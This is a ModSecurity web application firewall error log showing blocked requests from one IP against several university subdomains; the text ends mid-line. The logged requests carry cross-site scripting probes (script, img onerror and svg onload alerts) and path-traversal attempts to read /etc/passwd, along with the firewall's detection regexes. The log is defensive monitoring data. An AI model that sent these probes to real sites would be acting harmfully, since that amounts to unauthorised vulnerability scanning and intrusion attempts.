[Tue Aug 29 11:55:24.608233 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAApXgo4AAAAU"]
[Tue Aug 29 11:55:24.620554 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApa-O0AAAAg"]
[Tue Aug 29 11:55:24.640385 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAApa-O4AAAAg"]
[Tue Aug 29 11:55:24.746029 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:url: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "ZO16PMCo-f0AAApbUgwAAAAh"]
[Tue Aug 29 11:55:24.746821 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PMCo-f0AAAqqtfUAAAAA"]
[Tue Aug 29 11:55:24.747267 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:log: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO16PMCo-f0AAAolKoQAAAAe"]
[Tue Aug 29 11:55:24.787515 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/atmail/webmail/"] [unique_id "ZO16PMCo-f0AAApbUg0AAAAh"]
[Tue Aug 29 11:55:25.644160 2023] [:error] [pid 2730] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAqqtfYAAAAA"]
[Tue Aug 29 11:55:25.757705 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAolKoYAAAAe"]
[Tue Aug 29 11:55:25.760481 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAoz8FcAAAAS"]
[Tue Aug 29 11:55:25.819591 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAAqTvq0AAAAa"]
[Tue Aug 29 11:55:25.902703 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PcCo-f0AAApbUhEAAAAh"]
[Tue Aug 29 11:55:25.940706 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAqeFWAAAAAx"]
[Tue Aug 29 11:55:25.946095 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:union\\\\s*?(?:all|distinct|[(!@]*?)?\\\\s*?[([]*?\\\\s*?select\\\\s+)|(?:\\\\w+\\\\s+like\\\\s+[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98])|(?:like\\\\s*?[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\%)|(?:[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98]\\\\s*?like\\\\W*?[\\"'`\\xc2\\xb4 ..." at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: '\\x5c\\x22><svg/o found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "ft.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAoz8FoAAAAS"]
[Tue Aug 29 11:55:25.947582 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:fccc'\\x5c\\x5c\\x22><svg/onload: alert(/xss/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAqsV7IAAAAB"]
[Tue Aug 29 11:55:25.968288 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:operation. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:operation: 11111111</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet"] [unique_id "ZO16PcCo-f0AAAolKooAAAAe"]
[Tue Aug 29 11:55:25.982893 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16PcCo-f0AAApbUhMAAAAh"]
[Tue Aug 29 11:55:25.988598 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:fccc'\\x5c\\x5c\\x22><svg/onload: alert(/xss/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PcCo-f0AAAqTvrEAAAAa"]
[Tue Aug 29 11:55:26.083374 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS_NAMES:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: < found within ARGS_NAMES:fccc'\\x5c\\x5c\\x22><svg/onload: fccc'\\x5c\\x22><svg/onload"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PsCo-f0AAAqeFWIAAAAx"]
[Tue Aug 29 11:55:26.560365 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:format. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:format: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/atmail/"] [unique_id "ZO16PsCo-f0AAApbUhUAAAAh"]
[Tue Aug 29 11:55:26.616802 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqsV7YAAAAB"]
[Tue Aug 29 11:55:26.644925 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:language: \\x22><img src=x onerror=alert(1)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/webmail/"] [unique_id "ZO16PsCo-f0AAAqsV7cAAAAB"]
[Tue Aug 29 11:55:26.655454 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\balert\\\\b\\\\W*?\\\\(" at ARGS:fccc'\\\\"><svg/onload. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "163"] [id "958052"] [rev "2"] [msg "Cross-site Scripting (XSS) Attack"] [data "Matched Data: alert( found within ARGS:fccc'\\x5c\\x5c\\x22><svg/onload: alert(/xss/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/webapp/"] [unique_id "ZO16PsCo-f0AAAoz8GAAAAAS"]
[Tue Aug 29 11:55:26.700646 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAolKpAAAAAe"]
[Tue Aug 29 11:55:26.701067 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/search/"] [unique_id "ZO16PsCo-f0AAAqeFWgAAAAx"]
[Tue Aug 29 11:55:26.744179 2023] [:error] [pid 2732] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:q. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:q: <script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag 